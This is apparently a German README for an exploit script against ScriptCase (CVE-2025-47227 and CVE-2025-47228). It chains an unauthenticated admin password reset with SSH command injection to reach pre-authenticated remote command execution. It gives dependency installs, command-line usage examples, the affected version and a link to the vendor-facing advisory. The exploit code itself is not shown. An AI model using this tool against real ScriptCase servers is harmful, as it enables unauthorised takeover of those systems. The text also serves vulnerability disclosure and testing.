
ScriptCase-Exploit-Skript für die vorauthentifizierte Remote-Befehlsausführung (CVE-2025-47227, CVE-2025-47228).
Die Remote-Befehlsausführung ohne Authentifizierung wird durch die Verkettung zweier Schwachstellen erreicht: Die erste ermöglicht es, unter bestimmten Bedingungen das Administrator-Passwort der Produktionskonsole zurückzusetzen, die zweite ist eine einfache authentifizierte Remote-Befehlsausführung in den Verbindungsfunktionen, bei der Benutzereingaben direkt mit einem SSH-Systembefehl verkettet werden.
Die von den Exploits verwendeten Python-Abhängigkeiten von Drittanbietern können mit einem der folgenden Befehle installiert werden:
# pip - universell
pip3 install Pillow pytesseract requests beautifulsoup4
# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
Es wurde ein Exploit-Skript erstellt, das mehrere Szenarien abdeckt:
Usage:
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
Options:
-h, --help show this help message and exit
-u BASE_URL, --base-url=BASE_URL
-c COMMAND, --command=COMMAND
-p PASSWORD, --password=PASSWORD
-d, --detect
Betroffen ist Version 1.0.003-build-2 des Produktionsumgebungsmoduls. Diese Version des Moduls ist in ScriptCase Version 9.12.006 (23) enthalten. Frühere Versionen sind wahrscheinlich ebenfalls anfällig.
https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution